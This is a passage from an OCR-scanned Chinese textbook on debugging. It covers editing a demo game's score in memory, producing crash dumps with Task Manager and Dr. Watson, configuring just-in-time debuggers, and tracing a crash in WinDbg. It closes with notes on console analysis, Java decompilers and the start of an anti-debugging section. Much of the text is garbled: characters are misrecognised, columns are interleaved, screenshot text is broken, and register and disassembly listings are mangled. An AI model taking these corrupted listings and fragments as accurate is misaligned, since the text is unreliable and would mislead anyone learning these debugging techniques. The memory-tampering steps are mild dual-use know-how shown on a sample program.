e "SEE" ( SEE] ): 先 填 1000 就 好 





然后 按 下 “通常 检索 实行 ”( 执行 通 TER ) 按钮 开始 搜索 。 

这 时 ， 右 边 的 列表 中 显示 出 0012FD88 这 一 地 址 ， 看 来 29 这 个 数值 
的 确 被 保存 在 内 存 中 的 某 个 地 方 。 
顺便 说 一 句 ， 内 存 中 可 能 会 搜索 出 不 止 一 个 29。 如 果 出 现 这 种 情 
况 ， 可 以 改变 一 下 得 分 的 值 ， 然 后 再 试 一 次 。 
双击 这 个 地 址 ， 主 窗口 就 会 跳 转 到 这 一 地 址 的 位 置 ， 这 时 可 以 关 
闭 范围 检索 窗口 ， 然 后 将 光标 移动 到 0012FD88 地 址 上 的 “1D” 这 一 
数值 上 。 
我 们 可 以 把 1D 改 成 其 他 什么 数字 试 试看 ， 比 如 2D ( 45 )。 














V 将 0x1D ( 29 ) 加 上 0x10 改 成 Ox2D 


UH 552.274 —7 - [shootine.exe (PID: 00000154)] 

B 771 儿 虽 188500 FRO BRO TIO 722045 RW De 

ER ABE: zd LLL ee ml 
à 


ODUZEDEO | : 00 00 00 00/00 00 OO 00/00 00 00 oo|F 





[0012FD88-0012FD88: 1ht1)Byte ] BC 45, 45 ), W( 45, 45 ), DC 45, 45 ), Bit 00101101 ) -RW- [Windows ANSI — 

















然后 我 们 回 到 游戏 画面 …… 哇 ， 得 分 果然 变 成 了 45 分 ! 
这 里 写 什么 数字 都 是 可 以 的 ， 比 如 也 可 以 输入 一 个 很 大 的 数 。 
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V 可 以 任意 修改 得 分 


E shooting 


SCORE: 65313 ENERGY: 0000 





这 种 一 般 情况 下 绝对 达 不 到 的 得 分 也 可 以 很 容易 修改 出 来 。 

在 这 里 我 们 使 用 了 “ 免 耳 旋风 ”这 一 工具 来 进行 讲解 ， 实 际 上 一 般 
的 调试 器 也 完全 可 以 实现 这 样 的 功能 。 当 然 ， 我 们 不 仅 可 以 修改 得 分 ， 
也 可 以 修改 能 量 ， 有 兴趣 的 话 可 以 试 试看 。 









































a 








4 


2.4.8 获取 内 存 转 储 

刚才 我 们 修改 了 一 个 示例 游戏 的 内 存 数据 ， 除 此 之 外 我 们 还 可 以 将 
内 存 数据 保存 成 文件 ， 这 被 称 为 “内 存 转 储 ”( memory dump )。 
随 着 程序 ( 游戏 ) 的 运行 ， 内 存 中 的 数据 会 不 断 实时 变化 ， 如 有 果 要 
保存 某 个 时 间 点 的 状态 (快照 )， 我们 就 需要 内 存 转 储 。 

生成 内 存 转 储 非常 简单 。 








1 








> zt Windows Vista 及 以 上 版 本 中 生成 内 存 转 储 
如 果 你 使 用 Windows Vista 或 更 高 版 本 ， 可 以 按 以 下 步 又 来 操作 。 
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1. f£ Ctrl+Alt+Del 打开 任务 管理 器 
2. 右键 点 击 目标 进程 名 称 
3. 选择 “创建 转 储 文件 ” 


这 样 ， 系 统 就 会 生成 一 个 扩展 名 为 .DMP 的 文件 。 


V 生成 转 储 文件 1 








用 户 名 OU ARGAL. : 
explorer. exe Shyuj... 00 23,288 K 


guitest.exe 916 K 
IcbcDaemon. exe 打开 文件 位 置 (O) ] 


ICBCEBankAssist. exe 
lsass. exe 结束 进程 (E) 


lsm. exe 结束 进程 树 (T) 
peas. exe BD) 


SearchIndexer. exe 

secbizsrv. exe UAC 点 拟 化 W) 

smss, exe 

spoolsv. exe 设置 优先 级 (P) 


尾 性 (R) 
转 到 服务 (S) 








svchost. exe 
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V 生成 转 储 文件 2 


1E Windows 任务 管理 器 
文件 (有 ”选项 (QO) BBV) 帮助 (H) 


应 用 程序 | 进程 ”| 服务 ”| 性 能 ”| 联网 [me 


























MEER 5 用 户 名 OV ARGAL.. 


Chanmai 





转 储 进 程 
已 成 功 创建 文件 。 


文件 位 于 : 
C: Wsers\SHYUJI™1 \AppData\Local \Temp\guitest. DMP 


spoolsv. exe SYSTEM 
svchost. exe SYSTEM 


ares 





` 
«| 


VI 显示 所 有 用 户 的 进程 6) 结束 进程 E) 



































进程 数 : 48 CPU (FRE: 10096 MEAG: 5196 





尽管 操作 系统 会 按照 可 执行 文件 中 的 内 容 将 程序 加 载 到 内 存 中 ,但 
内 存 中 的 数据 与 可 执行 文件 中 的 数据 并 不 完全 相同 ， 大 家 可 以 用 二 进 制 
编辑 器 来 确认 一 下 。 


> Windows XP 及 以 下 版 本 的 系统 中 生成 内 存 转 储 

Windows XP 及 更 低 版 本 的 系统 中 自 带 了 一 个 叫 作 Dr. Watson 的 内 
存 转 储 工 具 ， 不 过 遗憾 的 是 ， 在 Windows Vista 及 以 上 版 本 中 ， 这 一 工 
具 已 经 被 去 掉 了 。 准 确 地 说 ， 这 是 一 个 当 进 程 异常 终止 时 将 内 存 数据 和 
简单 日 志保 存 到 文件 中 的 工具 ， 在 没有 安装 调试 器 或 开发 工具 的 环境 中 
可 以 帮助 快速 查找 程序 骨 演 的 原因 ， 因 此 曾经 受到 很 多 开发 者 的 青睐 。 

如 果 你 手 上 有 Windows XP， 可 按照 以 下 步 又 来 生成 内 存 转 储 。 如 果 
没有 Windows XP， 你 也 可 以 通过 下 面 的 描述 大 致 理 解 内 存 转 储 的 作用 。 

要 启动 Dr Watson， 首 先 点 击 开始 菜单 一 附件 一 系统 工具 一 系统 信 
息 ， 这 时 桌面 上 显示 出 系统 信息 窗口 。 
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从 系统 信息 的 菜单 中 选择 工具 一 Dr. Watson， 或 者 也 可 以 在 开始 一 
运行 中 输入 drwtsn32。 


启动 Dr. Watson 1 








[77 Zi 数值 


系统 还 原 Microsoft Windows XP Professional 
5.1.2800 Service Pack 3 内 部 版 本 号 Z 


Microsoft Corporation 
SHUM 


E Internet 设置 
innotek GmbH 
VirtualBox 
系统 类 型 基于 X86 的 PC 
处 理 器 x86 Family 6 Model 58 Stepping 9 Ger — 
BIOS 版 本 /日 期 innotek GmbH VirtualBox, 2006-12-1 
SMBIOS 版 本 2.5 
Windows 目录 C: WINDOWS 
系统 目录 C: \WINDOWS \system32 
\Device\HarddiskVolumel 
中 华人 民 共 


版 本 = “5.1.2600.5512 Gepsp. 080413-2. 
SHYUVMAXPMU ser 

中 国标 准时 间 

1,023.48 MB 


可 用 物理 762.68 MB m 
eset rh m 2 nn cm = 
< 


ia n | > 
ERA Q0: ERL) 关闭 查找 ©) 
口 只 搜索 所 选 的 类 别 (8) 口 只 搜索 类 别名 称 B) 























启动 Dr. Watson 2 


WDr. Watson for Findows 


日 志 交 件 路 径 L): [C: Documents and Setting 
ASHE): «C:\Documents and Setting 
EX 下) 
指令 数量 D: 
要 保存 的 错误 数量 QD : 
故障 转 储 类 型 QD: C 完整 (6 少量 个 NIA 兼容 完整 式 
选项 
厂 转 峙 符号 表 QD 
[v 转 峙 全 部 线程 上 下 文 A 
[v 附加 到 现 有 日 志文 件 EE) 


- 视觉 通知 QD 
厂 声音 通知 (8) 
jw 创建 故障 转 储 交 件 (D) 





应 用 程序 错误 QD 280 | sho | 
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f£ Dr. Watson 的 窗口 中 可 以 对 日 志和 转 储 文件 的 保存 路 径 、 指 令 数 
量 、 要 保存 的 错误 数量 等 进行 设置 。 

Dr. Watson 会 在 进程 异常 终止 时 完成 自己 的 工作 。 在 我 们 的 示例 程 
Ff guitest.exe 中 ， 从 菜单 打开 帮助 一 关于 对 话 框 ， 在 关闭 该 对 话 框 时 程 
序 就 会 异常 终止 。 至 于 其 他 程序 ， 只 要 遇 到 程序 崩 演 的 情况 也 都 可 以 。 
我 们 可 以 准备 一 段 简单 的 程序 来 引发 崩 演 ( 源 代码 包含 在 chap02\guitest\ 
guitest.cpp 中 )。 
































#include <stdio.h> 


int main() 


{ 
char *p = NULL; 
*p = 'A'; 


return 0; 


ETE, 我们 在 命令 行 窗口 中 运行 drwtsn32， 并 加 上 -i 选 项 。 这 样 
做 的 理由 我 们 在 后 面 会 讲 到 ， 简 单 来 说 ， 就 是 将 Dr Watson 注册 为 实时 
调试 器 (just-in-time debugger )。 














— 


v 运行 示例 
C:\>drwtsn32 -i 
这 样 准备 工作 就 完成 了 。 
下 面 让 我 们 来 运行 一 下 会 引发 崩溃 的 程序 。 
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V 进程 异常 终止 
guitest.exe 


guitest. exe 过 到 问题 需要 关闭 。 我 们 对 此 引起 的 不 便 表 示 抱 
Lon 





MOEN THES » BAA REA. 


abet roel has Microsofte 
创建 了 一 个 错误 报 党 , 您 可 以 将 它 发 送 给 我 们 。 我 们 将 
aca tee pa 


要 查看 这 个 错误 报告 包含 的 数据 ， 请 单 击 此 处 。 
发 送 错误 报告 @) 





Y Dr. Watson 生成 的 文件 


f» Dr Watson 
RH) 编辑 里) EEV KEA TAG eo 


Qa- O- p Orr Dre E 


HE (D) © C:\Documents and Settings\All Users\Application Data\Microsoft\Dr Watson xj 转 到 














PPA PES, 
Q9 tT 











我 们 可 以 看 到 ， 在 我 们 刚刚 设置 的 输出 路 径 中 ，Dr Watson 生成 了 
以 下 文件 。 





* user.dmp 


* drwtsn32.log 


pipe 就 是 该 进程 的 内 存 转 储 ， 此 外 还 有 一 个 drwtsn32.log 文件 ， 
在 这 个 日 志文 件 中 ， 对 错误 的 原因 进行 了 简单 的 描述 。 


2.1.4 ”从 进程 异常 终止 瞬间 的 状态 查找 骨 溃 的 原因 
我 们 来 看 一 下 drwtsn32.log 的 内 容 。 
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V drwtsn32.log 

















发 生 应 用 程序 意外 错误 : 
应 用 程序 : C:\Temp\guitest.exe (pid=3852) 
时 间 : 2012/07/02 @ 02:43:54.207 
意外 情况 编号 : c0000005 (访问 侵犯 ) 
































2 人 0 
计算 机 名 : VIRTUALXP-10791 
户 名 : XPMUser 
mam Id: 0 
FRKE: il 
理 器 类 型 : x86 Family 6 Model 37 Stepping 2 
Windows 版 本 : 5.1 
当前 内 部 版 本 号 : 2600 


Service Pack: 3 
































co 





当前 类 型 : Uniprocessor Free 
注 的 单位 : 
注册 的 所 有 者 : Windows XP Mode 


























*----» 任务 列表 <----* 


0 System Process 





4 System 
416 smss.exe 


476 csrss.exe 


省 略 


*----> 模块 清单 <----* 

(0000000000400000 - 0000000000412000 : 
C:\Temp\guitest.exe 

(000000003b100000 - 000000003b11b000: 
C:\WINDOWS\IME\IMJP8_1\Dicts\IMJPCD.DIC 

(000000004edc0000 - 000000004ee16000: 
C:\WINDOWS\system32\imjp81.ime 

省 略 





*----> 线程 ID 0xde0 的 状态 转 储 <----x 


eax-00000001 ebx=00000000 ecx=00000000 edx-00000041 
esi=00401290 edi=0012f958 eip=004012bf esp=0012f8f0 
ebp-0012f£8f0 iopl=0 nv up ei pl zr na po nc 
ess001b ss=0023 ds=0022 es=0023  fs-003b gs=0000 


ef1-00000246 
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*** ERROR: Module load completed but symbols 
could not be loaded for C:\Temp\guitest.exe 


函数 : guitest 
004012a4 
004012a7 
004012a8 
004012ac 
004012af 
004012b1 
004012b3 
004012b4 
004012b7 
004012ba 
错误 -> 
004012bf 
004012c2 
004012c5 
004012c6 
004012c7 
(004020a8)] 
省 略 








106683 adc [esi-0x7d] ,ah 

f8 gie 

01740c66 add [esp+ecx+0x66],esi 

83£802 cmp eax, 0x2 

7406 jz guitest+0x12b7 (004012b7) 
33c0 xOr eax,eax 

5d pop ebp 

c21000 ret 0x10 

0fb7c0 movzx eax,ax 


ba41000000 mov edx, 0x41 


668911 mov [ecx] dx ds:0023:00000000=???? 
8b4d08 mov ecx, [ebp+0x8] 

50 push eax 

BI push ecx 


££15a8204000 call dword ptr [guitest+0x20a8 
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E 的 时 间 、 用 户 


名 、 操 作 系统 版 本 以 及 其 他 正在 运行 的 进程 列表 等 全 局 信息 。 从 错误 代 


码 来 看 ， 程 序 崩溃 的 原因 是 对 内 存 进行 了 





系统 信息 中 记载 了 操作 系统 、CPU、 


中 记载 了 运行 中 的 所 有 进程 ， 这 些 都 是 与 骨 
接 下 来 的 模块 清单 中 ， 记 载 了 骨 江 时 进程 所 加 载 的 模块 ， 从 
确认 每 个 模块 各 自 所 映射 的 内 存 地 址 。 





























E 法 访问 。 























下 面 是 最 重要 的 部 分 一 一 “线程 ID 0xde0 的 状态 转 储 ”， 








载 了 导致 月 溃 的 指令 以 及 前 溃 时 的 寄存 器 状态 。 
我 们 可 以 看 到 ， 在 地 址 004012bf 的 mov 指令 旁边 写 着 一 个 “错误 ” 
字样 , mov [ecx],dx 这 条 指令 的 功能 是 将 dx WAS A ecx 所 代表 的 内 存 








] 户 名 等 简单 信息 ， 任 务 列表 
溃 相 关 的 环境 信息 。 
PP 可 以 





KEM 








"i 
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再 看 一 下 寄存 器 ， 我 们 发 现 ecx 的 值 为 00000000， 将 数据 写 入 
00000000 这 个 地 址 当然 会 出 错 ， 这 就 是 导致 月 泪 的 原因 。 

像 这 样 ， 通 过 获取 进程 异常 终止 时 的 状态 ， 对 于 找到 问题 的 原因 是 
非常 有 帮助 的 。 











2.1.5 ”有效 运用 实时 调试 

IRER, Windows Vista 及 更 高 版 本 中 已 经 不 再 提供 Dr. Watson, 但 
Windows 本 身 具备 实时 调试 功能 。 具 体 来 说 ， 就 是 在 进程 遇 到 无 法 继续 
行 的 错误 而 被 强制 关闭 时 ， 调 试 器 会 自动 打开 ， 并 自动 挂 载 到 出 错 的 
进程 上 。 


BE N 


。 实 时 调试 
https://msdn.microsoft.com/zh-cn/library/Shs4b7a6.aspx 





在 前 面 讲 到 Dr Watson 的 时 候 ， 我 们 在 命令 行 窗口 运行 了 drwtsn32 -i, 
这 就 表示 将 Dr Watson 注册 为 系统 的 默认 实时 调试 器 。 

我 们 可 以 在 注册 表 中 启用 或 禁用 实时 调试 。 请 用 regedit 打开 下 面 的 
注册 表 项 。 





























V 实时 调试 的 设置 


DER 





类 型 数据 

REG SZ GHEE) 

REG_SZ 1 

REG SZ drwtsn32 -p Md -e Md -g 
0x00000000 (0) 


(CJ Compatibility 
(CJ Conpatibility32 


GRROHENRAHKET LOCAL MACKINENSOFTWAREMMi crosoft\Windows NT\CurrentVersi on\AeDebug 
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V 变更 点 





HKEY LOCAL MACHINEV 
SOFTWARE \ 
Microsoft\ 
Windows NT\ 
CurrentVersion\ 
AeDebug\ 
Debugger 这 里 
.NETFramework\ 
DbgManagedDebugger 这 里 
Wow6432NodeV 
Microsoft\ 
Windows NT\ 
CurrentVersionV 
AeDebug\Debugger 这 里 (x64) 
.NETFramework\ 
DbgManagedDebugger 这 里 (x64) 















































上 面 两 个 地 方 是 实时 调试 的 设置 ， 下 面 两 个 地 方 是 64 位 系统 中 针 
对 32 位 程序 的 设置 。 在 这 里 填 人 调试 器 的 路 径 ， 就 可 以 使 用 任意 调试 
需 来 进行 实时 调试 了 。 

当然 ,我 们 在 第 1 章 中 介绍 过 的 OllyDbg 也 可 以 作为 实时 调试 器 来 
使 用 。 

f£ OllyDbg 的 菜单 中 点 击 Options > Just-in-time debugging， 会 弹出 
一 个 设置 对 话 框 。 点 击 “Make OllyDbg just-in-time debugger” 按 钮 ， 
OllyDbg 就 会 将 自己 的 信息 配置 到 上 述 注册 表 项 目 中 。 

















Y OllyDbg 的 实时 调试 设置 1 






OllyDbg — [CPU] 
File View Debug Plugins (380568 Window Help 


Appearance 


Debugging options ALttO 


Just-in-time debugging 


Add to Explorer 
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V OllyDbg 的 实时 调试 设置 2 


Just-in-time debugging 


Current settings: 





-JIT debugger is drwtsn32 
- Debugger attaches without confirmation 


Restore old just-in-time debugger | 
Confirm before attaching | 


Attach without confirmation 





我 们 可 以 试 试看 在 将 OllyDbg 设置 为 实时 调试 右 之 后 ， 再 一 次 运行 
前 面 那 个 会 崩溃 的 程序 。 这 次 程序 崩溃 后 OllyDbg 会 自动 打开 ， 然 后 挂 
载 到 骨 溃 的 进程 上 。 


Y OllyDbg 挂 载 到 骨 溃 的 应 用 程序 上 


OllyDbg — guitest.exe — [CPU — main thread, module guitest] 
[C] File View Debug Plugins Options Window Help 








BR 41000000 MOU EDX, 41 

66:8911 PTR DS: [ECX], DX 
9840 08 MOU ECX, DWORD PTR SS: [EBP+8] 
e PUSH ERX 

FF15 08204000 

BS 61666666 


gu itest. 00401290 


18 
CX, DWORD PTR DS: (4030001 MA 
iZ SHORT guitest.004012EG st.004012BF 


-== BLFFFFFFFF) 


出 a 
Dx=0041 Š E 
DS: [89866606]=?3? B 
RE 


4| RETURN to USERS2. 77018734 


Ø| gu itest. 60401296 








^ 8 4 
Access violation writing to [00000000] - use Shift«F 7/FB/FS to pass exception to program. 


7 


实时 调试 对 于 处 理 一 些 难以 重 现 的 bug 非常 有 效 ， 当 你 已 经 能 够 熟 
练 使 用 调试 器 之 后 ， 不 妨 积极 尝试 一 下 。 


2.1.6 通过 转 储 文件 寻找 出 错 原因 
当 程 序 肯 泪 时 ， 最 好 能 够 第 一 时 间 启 动 调试 器 ， 但 有 些 情 况 下 无 法 
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做 到 这 一 点 。 不 过 ， 即 便 在 这 样 的 情况 下 ， 只 要 我 们 留 下 了 转 储 文件 ， 
也 能 够 通过 它 来 找到 出 错 的 原因 。 

转 储 文件 可 以 使 用 WinDbg 来 分 析 。 

下 面 我 们 来 分 析 一 下 chap02\guitest2 中 的 guitest2.exe 的 转 储 文件 
( user.dmp )， 顺 便 学 习 一 下 WinDbg 的 使 用 方法 。 

首先 打开 WinDbg， 然 后 按 Ctrl+D 或 者 点 击 菜单 中 的 File Open 
Crash Dump ， 打 开 转 储 文件 。 

















V 用 WinDbg 打开 转 储 文件 1 


&J winDbg:6.11.0001.404 X86 





IZ Edit View Debug Window Help 
































Open Source File... Otro pene 49 EIE EDEIS E DES EE A, 图 
Close Current Window Ctrl+F4 

Open Executable... Otrl«E 

Attach to a Process... F6 


ash Dump. Ctrl+D 





Connect to Remote Session.. CtriltR 
Connect to Remote Stub.. 
Kernel Debug... Ctrl+K 





V 用 WinDbg 打开 转 储 文件 2 


EJ Dump C:XDocuments and Settines* All Users¥ Application Data¥Microsoft¥Dr Watson#userX-d 
Eile Edit View Debug Window Help 


SSE SR €) (oo © OPDSORSOSS (81 


101 























ES Command - Dump C:XDocuments and Settines¥All Users¥ Application Data¥ Microsoft® Ey 


Microsoft (R) Windows Debugger Version 6.11.0001.404 X86 
Copyright (c) Microsoft Corporation. All rights reserved. 


Loading Dump File [C:\Documents and Settings\All Users\Application Data\Microsoft\Dr 
User Mini Dump File: Only registers, stack and portions of memory are available 


Comment: ‘Dr. Watson generated MiniDump' 

Symbol search path is: SRV*c:\websymbols*http://msdl.microsoft.com/download/symbols 
Executable search path is: 

Windows XP Version 2600 (Service Pack 3) UP Free x86 compatible 

Product: WinNt, suite: SingleUserTS 

Machine Name: 

Debug session time: Wed Jul 4 07:33:45.000 2012 (GMT+9) 

System Uptime: not available 

Process Uptime: 0 days 0:00:05.000 


This dump file has an exception of interest stored in it. 

The stored exception information can be accessed via .ecxr. 

(f64.bdc): Access violation - code c0000005 (first/second chance not available) 
eax=00000000 ebx-00000000 ecx-7c94f661 edx-00000041 esi-00000001 edi=0012£958 
eip=00000000 esp-0012f£8e8 ebp-0012f8f0 iopl=0 nv up ei pl zr na pe nc 
上 ee 002s ds-0023 es=0023 £fs-003b gs=0000 ef 1=00000246 





Ln 0, col0 Sys 0:C¥Docu) Proc 000f64 Thrd 000:bde | ^ 
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WinDbg 虽然 看 起 来 有 图 形 界面 ， 但 实际 上 却 更 像 是 一 个 命令 行 工 
具 ， 因 为 它 基 本 上 是 通过 命令 交互 来 进行 调试 的 。 因 此 和 OllyDbg fH 
比 ， 对 于 初学 者 来 说 更 难 上 手 。 然 而 ， 有 一 些 情况 只 能 使 用 WinDbg 来 
进行 调试 ， 例 如 64 位 程序 以 及 运行 在 内 核 领域 的 程序 等 ， 因 此 大 家 最 
好 还 是 学 一 学 。 

第 一 次 启动 之 后 只 有 一 个 Command 窗口 ， 从 View 菜单 中 可 以 显示 
更 多 的 窗口 。 

我 们 先 来 显示 另外 两 个 窗口 ， 按 以 下 步 又 操作 。 









































e Alt-6: 显示 Call Stack ( AK) 窗口 
e Alt+7: 显示 Disassembly ( 反 汇 编 ) 窗口 


Y Call Stack 窗口 


Raw args |Func info Source Addrs Headings Nonvolatile regs Frame nums Source ares More Less 





WARNING: Frame IP not in any known module. Following frames may be wrong. 
f91c 34 

44 0111 qu 
00401290 000b0144 00000111 user32! InternalCallWinProc+0x28 
00000000 00401290 000b0144 user32!UserCallDlgProcCheckWow-0x146 
00000000 00000111 00000001 user32!DefDlgProcWorker+0xa8 
000b0144 00000111 00000001 user32!DefDlgProcW+0x22 
77d03d3a 000b0144 00000111 user32! InternalCallWinProc+0x28 
00000000 77d03d3a 000b0144 user32!UserCallWinProcCheckWow+0x150 
O06alf£8 00660dd8 00000001 user32!SendMessageVorkert+0x4a5 
000b0144 00000111 00000001 user32!SendMessagel+0x7t 
00682340 00000000 00682340 user32!xxxButtonNotifyParent+0x41 
00165e7c 00000001 00000000 user32!xxxBNReleaseCapturet+O0xf8 
006482340 00000202 00000000 user32!ButtonWndProcWorker+0x6df 
0005020c 00000202 00000000 user32!ButtonWndProci+0x4c 
77d051d1 0005020c 00000202 user32! InternalCallWinProc+0x28 
00000000 77d051dl 0005020c user32!UserCallWinProcCheckWow+0x150 
DOi2fcf8 00000000 0012fcdc user32!DispatchMessageWorker-0x306 
0012fcf8 00000000 006alff8 user32!DispatchMessageW-*Üxf 
000b0144 006a2340 00180152 user32!IsDialogMessageW*0x572 
00050144 001e0152 00000001 user32!DialogBox240x144 
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Y Disassembly 窗口 


Ri Disassembly - Dump C: Documents and Settines¥ All Users Application Data* Microsoft [Rl 回国 | 





我 们 先 来 看 一 下 Disassembly 窗口 。 

这 里 本 来 应 该 显示 出 反 汇 编 之 后 的 代码 ， 但 由 于 EIP 的 值 为 
00000000， 因 此 现在 只 显示 一 堆 问 号 ， 这 就 表示 “出 于 某 些 原因 ， 程 序 
跳 转 到 了 00000000 这 个 地 址 ”。 

下 面 我 们 来 追溯 一 下 函数 调用 的 过 程 。 从 Call Stack 窗口 中 我 们 可 
以 看 到 这 样 一 行 。 

















V 运行 结果 


0012f8f0 77c£8734 000b0144 00000111 00000001 guitest240x12d0 





双击 这 一 行 ， 再 看 一 下 Disassembly 窗口 ， 这 时 会 显示 出 guitest2+ 
Ox12d0 地 址 的 内 容 。 


V 运行 结果 


004012b7 6844214000 push offset guitest2+0x2144 (00402144) 
004012bc ££1500204000 call dword ptr [guitest2+0x2000 
(00402000) ] 

004012c2 6860214000 push offset guitest2+0x2160 (00402160) 
004012c7 50 push eax 

004012c8 ££1504204000 call dword ptr [guitest2+0x2004 
(00402004)] 
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004012ce ffd0 call eax 
004012d0 8b4d08 mov ecx,dword ptr [ebp+8] 运行 停止 处 
004012d3 0fb7c6 movzx eax,si 





当前 显示 的 地 址 是 004012d0， 我 们 看 一 下 前 一 条 指令 call eax, FX 
Alt+4 可 以 查看 寄存 器 的 值 。 

eax 寄存 器 的 值 果然 是 00000000。 也 就 是 说 ，004012ce 的 这 条 call 
eax 指令 调用 了 00000000 这 个 地 址 ， 看 来 这 就 是 引发 崩 演 的 原因 。 

地 址 004012c8 处 也 执行 了 一 条 call 指令 ， 由 于 返回 值 会 存放 在 eax 
中 ， 因 此 我 们 可 以 推测 ，eax 的 00000000 是 从 这 里 来 的 。 

那么 ， 这 里 调用 的 又 是 什么 函数 呢 ? 按 Alt+5 打开 Memory ( 内存 ) 
窗口 ， 在 显示 Virtual 的 地 方 输入 “00402004”. 




















v 运行 示例 


Virtual: 00402004 


地 址 00402004 的 值 为 04 24 00 00 ( =00002404 )。 

这 里 显示 的 值 是 相对 于 基地 址 的 偏 移 量 ， 因 此 我 们 再 输入 
00400000+2404=00402404， 这 时 会 显示 出 调用 的 函数 名 称 ， 即 
GetProcAddress。 














v 运行 示例 


Virtual: 00402404 
00402404 45 02 47 65 74 50 72 6f 63 41 64 64 72 65 73 73 00 00 
Get ProcAddress 


按 相同 的 思路 ， 我 们 还 可 以 看 一 下 地 址 004012bc 所 call 的 函数 是 
什么 。 


v 运行 示例 


Virtual: 00402000 
00402000 f4 23 00 00 04 24 00 00 00 28 00 00 ea 27 00 00 da 27 
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v 运行 示例 


Virtual: 004023f4 
004023f4 3f 03 4c 6f 61 64 4c 69 62 72 61 72 79 57 00 00 45 02 
LoadLibrars yW 


接 下 来 我 们 在 Memory 窗口 中 确认 一 下 调用 这 些 函 数 所 传递 的 参 
数 ， 现 在 我 们 可 以 将 刚才 的 反 汇 编 代 码 改 写成 更 易 懂 的 形式 。 





004012b7 6844214000 push "kernel31.dll" 
004012bc ££1500204000 call LoadLibraryW 
004012c2 6860214000 push "GetCurrent ProcessId" 


004012c7 50 push eax 

004012c8 ff1504204000 call Get ProcAddress 

004012ce ffd0 call eax 

004012d0 8b4d08 mov ecx,dword ptr [ebp+8] 运行 停止 处 
004012d3 0fb7c6 movzx eax,si 








现在 看 起 来 更 容易 懂 了 吧 ， 而 且 我 们 也 已 经 发 现 了 bug 的 原因 。 

LoadLibraryW 函数 的 参数 为 kernel31.dll， 但 实际 上 系统 中 没有 
kernel31.dll 这 个 DLL 文件 ， 因 此 LoadLibraryW 函数 会 调用 失败 。 

到 这 里 程序 还 没有 骨 演 ,但 后 面 的 GetProcAddress 函数 也 会 调用 
失败 。 

随后 ， 失 败 的 GetProcAddress PK BUI] f 00000000， 于 是 call eax 
时 进程 就 异常 终止 了 。 

能 有 人 会 吐槽 这 个 程序 居然 没有 对 LoadLibraryW 的 返回 值 做 容 

错 处 理 ， 而 且 居 然 有 人 会 犯 kernel31.dll 这 种 低级 错误 。 这 个 程序 只 是 演 
示 用 的 ， 所 以 请 大 家 别 太 较 真 。 
象 上 面 这 样 ， 通 过 分 析 转 储 文件 ， 我 们 可 以 找到 一 些 导 致意 外 错误 
的 原因 并 进行 修正 。 
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或 好 或 坏 的 目的 。 


备 内 存 转 储 和 调试 等 帮助 进 























那么 ， 除 了 个 人 


当然 ， 在 这 些 设 备 

















电脑 以 外 ， 其 他 计 


算 机 设备 上 的 


-一 专栏 : 除了 个 人 电脑 ， 在 其 他 计算 机 设备 上 运行 的 一 一 一 

程序 也 可 以 进行 分 析 吗 
像 Windows, Linux, Mac OS X 等 一 般 的 主流 操作 系统 中 都 
行 软件 分 析 的 功能 。 这 些 功能 本 来 是 为 
了 提高 软件 开发 的 效率 ， 当 然 ， 利 用 这 些 功能 也 能 够 实现 其 他 一 些 


























情况 又 如 何 呢 ? 


























0 说 智能 手机 和 游戏 机 上 能 不 能 进行 软件 分 析 呢 ? 















































































































































上 开发 软件 时 也 会 使 








到 调试 器 ， 厂 商 也 会 





















































































































































个 叫 作 devkitPro 的 网 站 上 




















提供 专用 的 开发 设备 ， 换 句 话说 ， 这 些 设备 和 个 人 电脑 没有 本 质 的 
区 别 。 

只 不 过 ， 由 于 这 些 设备 的 技术 并 不 像 个 人 电脑 一 样 公 开 ， 因 此 
“一 般 人 对 游戏 机 和 家 电 产 品 进行 分 析 ” 这 种 事 好 像 插 少见 的 。 实 际 
上 ， 这 些 设备 在 上 市 时 往往 会 关闭 调试 功能 ， 或 者 不 公开 具体 的 调 
试 方法 ， 因 此 用 起 来 并 不 像 个 人 电脑 一 样 随 心 所 欲 。 然 而 ， 这 些 设 
备 中 也 装 有 处 理 器 ( CPU )， 这 些 处 理 器 自然 也 能 够 执行 汇编 指令 ， 
为 此 如 果 有 办 法 对 其 进行 反 汇 编 并 获取 内 存 转 储 ， 那 么 就 可 以 进行 
分 析 了 。 


有 很 多 喜欢 分 析 各 种 游戏 机 的 爱 














好 者 ， 他 们 发 布 了 








e devkitPro 





E 77 897 





些 非 





兴趣 的 话 可 以 上 去 看 一 看 。 


http://devkitpro.org/ 


发 环境 。 这 个 网 站 是 英语 的 ， A 


























Java 的 

















这 一 理念 ，Java K 




















了 下 面 的 技术 。 


一 SE: 分 析 Java 编写 的 应 用 程序 


发 理念 是 “Write once, run anywhere”， 即 不 依赖 操 





FF 台 上 运行 。 为 了 实现 











作 系 统 和 硬件 ， 编 写 一 次 代码 就 可 以 在 各 种 3 


e 在 编译 时 ， 源 代码 会 被 编译 成 字 节 码 ( 一 种 抽象 的 中 间 语 言 











Java 


的 字 


© 为 各 种 环境 分 别 安装 能 够 解释 和 执 








2.1 解读 内 存 转 储 | 


行 字 节 码 的 虚拟 机 











只 要 有 Java 虚拟 机 ， 程 序 就 可 以 在 任何 环境 下 运行 这 就 是 
的 最 大 特点 。 





























因此 ， 对 Java 编写 的 程序 进行 分 析 ， 








入 码 进 行 分 析 。 

















有 一 些 工 














器 ( decompiler )。 


应 的 


e Java 反 编 译 器 
http://java.decompiler.free.fr/ 


1H EE x86 7 











能 够 将 字 节 码 还 原 成 源 代码 ， 这 些 工具 称 为 反 编 译 


实际 上 就 相当 于 对 Java 









































Cie Skit, Java 字 节 码 











以 外 ， 还 有 很 多 场合 都 会 用 到 它 。 


Y class 文件 的 反 汇 编 结果 


Wr Java Decompiler - dentaku4.class 


File Edit Navigate Search Help 





容易 还 原 成 源 代 码 ， 相 








反 汇 编 器 也 出 现 已 久 。Eclipse 也 有 反 汇 编 插 件 ， 除 了 软件 分 析 


DER 





be? x| 


FAD 


B errDisp(Strine? 
65 main(String) 


dentaku4.class x | 





void élimport java. io. PrintStream; 
void 


D id-eui-0.3.5.windows.zip (Class dentaku4 


日 
D 


jd-euicfe 
jd-guiexe 


{ 
int vall = 0; 
int val2 = 0; 


if (args.length != 3) { 
exrDisp("5 |EISTBETS") 2 


errDisp(“EETISHNSE A): 
} 





String ope = args[1]; 








public static void main(String[] args) 


vall = Integer.parseInt(args[0]); 
val2 = Integer.parseInt(args[2]); 
) catch (NumberFormatException e) { 
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2.2 ”如 何 防止 软件 被 别人 分 析 


2.2.1 反 调 试 技术 

尽管 在 开发 的 时 候 调 试 技 术 为 我 们 带 来 了 很 多 便利 ， 但 软件 发 布 之 
